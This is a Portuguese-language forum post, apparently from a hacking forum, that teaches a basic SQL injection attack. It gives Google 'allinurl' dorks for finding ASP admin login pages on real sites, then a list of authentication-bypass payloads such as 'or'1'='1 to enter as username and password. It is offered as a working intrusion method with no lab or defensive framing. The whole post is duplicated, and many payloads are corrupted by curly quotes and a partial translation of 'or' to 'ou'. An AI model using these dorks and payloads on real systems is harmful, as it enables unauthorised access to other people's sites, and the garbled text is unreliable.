Olá usuários do Fórum do Guia do Hacker. Eu sou o Movi3r, e hoje estou aqui para ensina-los um SQL Injection basico.
OBS: Lembrando que este método é funcional, mas apenas funciona em alguns sites. Que a página de admin termina em .asp
Bom vamos lá !
Abra o seu navegador, e abra o Google.
No Google, digite umas da allinurl's abaixo:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
Quando achar um site de página de administrador com uma terminação acima, tente fazer um login com as scripts abaixo:
'or'1'='1
b’ or ‘ 1=’
‘ or ’1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (‘a’='a
‘ or ’1'=’1
admin ‘ – -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (‘ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (‘ a’='a
“) ou (“a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (‘ a’='a
hi”) ou (“a”=”a
‘ or ‘x’='x
EXEMPLO: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
USUÁRIO:
SENHA:
--- Escolha uma script e coloca no usuário e senha ---
USUÁRIO: 'or'1'='1
SENHA: 'or'1'='1
---------------------------------------------------------------------------
Bem é isso aí, obrigado por estarem vendo este tutorial, e espero ter ajudado.
Para fazer contato comigo, adicionme no MSN:
Movi3r@live.com
E siga-me no twitter:
@Movi3r
OBS: Lembrando que este método é funcional, mas apenas funciona em alguns sites. Que a página de admin termina em .asp
Bom vamos lá !
Abra o seu navegador, e abra o Google.
No Google, digite umas da allinurl's abaixo:
allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp
Quando achar um site de página de administrador com uma terminação acima, tente fazer um login com as scripts abaixo:
'or'1'='1
b’ or ‘ 1=’
‘ or ’1
‘ or ‘|
‘ or ‘a’='a
‘ or ”=’
‘ or 1=1–
‘) or (‘a’='a
‘ or ’1'=’1
admin ‘ – -
‘ ou 0=0 –
“ou 0=0 –
ou 0=0 –
‘ ou 0=0 #
“ou 0=0 #
ou 0=0 #
‘ ou ‘ x’='x
“ou” x”=”x
‘) ou (‘ x’='x
‘ ou 1=1 –
“ou 1=1 –
ou 1=1 –
‘ ou a=a –
“ou” a”=”a
‘) ou (‘ a’='a
“) ou (“a”=”a
hi “ou” a”=”a
hi “ou 1=1 –
hi ‘ ou 1=1 –
hi ‘ ou ‘ a’='a
hi ‘) ou (‘ a’='a
hi”) ou (“a”=”a
‘ or ‘x’='x
EXEMPLO: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
USUÁRIO:
SENHA:
--- Escolha uma script e coloca no usuário e senha ---
USUÁRIO: 'or'1'='1
SENHA: 'or'1'='1
---------------------------------------------------------------------------
Bem é isso aí, obrigado por estarem vendo este tutorial, e espero ter ajudado.
Para fazer contato comigo, adicionme no MSN:
Movi3r@live.com
E siga-me no twitter:
@Movi3r